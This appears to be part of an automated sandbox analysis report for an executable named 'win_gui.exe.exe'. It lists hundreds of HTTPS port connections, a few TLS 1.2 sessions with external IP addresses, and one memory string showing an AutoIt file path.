Source: unknownNetwork traffic detected: HTTP traffic on port 50083 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49999
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49998
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49997
Source: unknownNetwork traffic detected: HTTP traffic on port 50121 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49996
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49995
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49994
Source: unknownNetwork traffic detected: HTTP traffic on port 50016 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49993
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49992
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49991
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49990
Source: unknownNetwork traffic detected: HTTP traffic on port 50188 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50220 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50109 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50072 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50132 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50027 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50199 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49989
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49988
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49987
Source: unknownNetwork traffic detected: HTTP traffic on port 50013 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50216
Source: unknownNetwork traffic detected: HTTP traffic on port 50036 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50215
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50218
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50217
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50219
Source: unknownNetwork traffic detected: HTTP traffic on port 50174 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50139 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50151 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50116 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50210
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50212
Source: unknownNetwork traffic detected: HTTP traffic on port 50225 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50059 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50202 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50211
Source: unknownNetwork traffic detected: HTTP traffic on port 50094 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50214
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50213
Source: unknownNetwork traffic detected: HTTP traffic on port 50071 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50106
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50227
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50105
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50226
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50108
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50229
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50107
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50228
Source: unknownNetwork traffic detected: HTTP traffic on port 49975 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50060 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50109
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50100
Source: unknownNetwork traffic detected: HTTP traffic on port 50186 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50221
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50220
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50102
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50223
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50101
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50222
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50104
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50225
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50103
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50224
Source: unknownNetwork traffic detected: HTTP traffic on port 50025 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49964 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50128 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50162 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50197 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49999 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50117
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50238
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50116
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50237
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50119
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50118
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50230
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50111
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50232
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50110
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50231
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50113
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50234
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50112
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50233
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50115
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50236
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50114
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50235
Source: unknownNetwork traffic detected: HTTP traffic on port 50001 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49986 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49963 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50127 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50175 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50198 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50213 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50232 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50007
Source: unknownNetwork traffic detected: HTTP traffic on port 50037 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50128
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50006
Source: unknownNetwork traffic detected: HTTP traffic on port 50012 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50127
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50009
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50008
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50129
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50120
Source: unknownNetwork traffic detected: HTTP traffic on port 50093 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50001
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50122
Source: unknownNetwork traffic detected: HTTP traffic on port 50150 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50000
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50121
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50003
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50124
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50002
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50123
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50005
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50126
Source: unknownNetwork traffic detected: HTTP traffic on port 50224 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50004
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50125
Source: unknownNetwork traffic detected: HTTP traffic on port 50048 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50082 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50105 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49997 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50164 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50106 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50129 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50003 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50184 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49977 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50081 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50117 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50173 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50035 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50014 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50152 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50070 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49988 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50201 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50046 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50141 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50212 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50233 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50118 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50092 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50200 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50223 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50047 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50024 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50163 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50140 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50205
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50204
Source: unknownNetwork traffic detected: HTTP traffic on port 49998 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50207
Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50196 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50206
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50209
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50208
Source: unknownNetwork traffic detected: HTTP traffic on port 50058 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50201
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50200
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50203
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50202
Source: unknownNetwork traffic detected: HTTP traffic on port 50002 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49987 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50185 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50069 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50054
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50175
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50053
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50174
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50056
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50177
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50055
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50176
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50058
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50179
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50057
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50178
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50059
Source: unknownNetwork traffic detected: HTTP traffic on port 49984 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50180
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50061
Source: unknownNetwork traffic detected: HTTP traffic on port 50022 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50182
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50060
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50181
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50063
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50184
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50062
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50183
Source: unknownNetwork traffic detected: HTTP traffic on port 50068 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50102 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50045 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50125 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50194 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49996 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50010 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50148 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50065
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50186
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50064
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50185
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50067
Source: unknownNetwork traffic detected: HTTP traffic on port 50091 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50113 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50188
Source: unknownNetwork traffic detected: HTTP traffic on port 50056 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50066
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50187
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50069
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50068
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50189
Source: unknownNetwork traffic detected: HTTP traffic on port 50205 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50216 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50183 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50070
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50191
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50190
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50072
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50193
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50071
Source: unknownNetwork traffic detected: HTTP traffic on port 50159 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50192
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50074
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50195
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50073
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50194
Source: unknownNetwork traffic detected: HTTP traffic on port 50080 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50204 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50227 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50195 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50009 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50034 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49972 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50147 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50172 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50076
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50197
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50075
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50196
Source: unknownNetwork traffic detected: HTTP traffic on port 50057 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50078
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50199
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50077
Source: unknownNetwork traffic detected: HTTP traffic on port 50114 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50198
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50079
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50081
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50080
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50083
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50082
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50085
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50084
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50087
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50086
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50089
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50088
Source: unknownNetwork traffic detected: HTTP traffic on port 50079 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50090
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50092
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50091
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50094
Source: unknownNetwork traffic detected: HTTP traffic on port 50136 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49983 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50093
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50096
Source: unknownNetwork traffic detected: HTTP traffic on port 50023 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50095
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50018
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50139
Source: unknownNetwork traffic detected: HTTP traffic on port 50170 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50017
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50138
Source: unknownNetwork traffic detected: HTTP traffic on port 50193 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50019
Source: unknownNetwork traffic detected: HTTP traffic on port 49974 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50149 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50010
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50131
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50130
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50012
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50133
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50011
Source: unknownNetwork traffic detected: HTTP traffic on port 50055 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50132
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50014
Source: unknownNetwork traffic detected: HTTP traffic on port 50090 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50135
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50013
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50134
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50016
Source: unknownNetwork traffic detected: HTTP traffic on port 50078 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50137
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50015
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50136
Source: unknownNetwork traffic detected: HTTP traffic on port 50161 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50140
Source: unknownNetwork traffic detected: HTTP traffic on port 50215 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50230 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50029
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50028
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50149
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50021
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50142
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50020
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50141
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50023
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50144
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50022
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50143
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50025
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50146
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50024
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50145
Source: unknownNetwork traffic detected: HTTP traffic on port 50226 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50027
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50148
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50026
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50147
Source: unknownNetwork traffic detected: HTTP traffic on port 49985 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50000 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50021 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50030
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50151
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50150
Source: unknownNetwork traffic detected: HTTP traffic on port 50138 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50067 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50103 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50039
Source: unknownNetwork traffic detected: HTTP traffic on port 49995 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50011 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50153
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50031
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50152
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50034
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50155
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50033
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50154
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50036
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50157
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50035
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50156
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50038
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50159
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50037
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50158
Source: unknownNetwork traffic detected: HTTP traffic on port 50182 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50160
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50041
Source: unknownNetwork traffic detected: HTTP traffic on port 50137 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50162
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50040
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50161
Source: unknownNetwork traffic detected: HTTP traffic on port 50066 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50104 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50089 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50203 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50033 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50171 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50043
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50164
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50042
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50163
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50045
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50166
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50044
Source: unknownNetwork traffic detected: HTTP traffic on port 50115 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50165
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50047
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50168
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50046
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50167
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50049
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50048
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50169
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50050
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50171
Source: unknownNetwork traffic detected: HTTP traffic on port 50160 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50170
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50052
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50173
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50051
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50172
Source: unknownNetwork traffic detected: HTTP traffic on port 50044 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50126 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50214 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50231 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50145 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50168 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50122 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49970 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50042 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50007 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50180 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50219 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50018 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50077 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50134 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50053 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49981 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50237 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50088 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50076 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50133 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50099 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50031 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50156 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50043 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49992 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50100 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49969 -> 443
Source: unknownHTTPS traffic detected: 172.67.167.249:443 -> 192.168.2.5:49959 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.5:49963 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.5:49964 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.5:49966 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.5:49967 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.5:50068 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.5:50084 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.5:50105 version: TLS 1.2
Source: win_gui.exe.exe, 00000000.00000003.2674720642.0000000007D4A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\C:\Program Files (x86)\autoit3\Examples\Helpfile\_WinAPI_RegisterRawInputDevices[2].au3_${memstr_b62a08a2-b
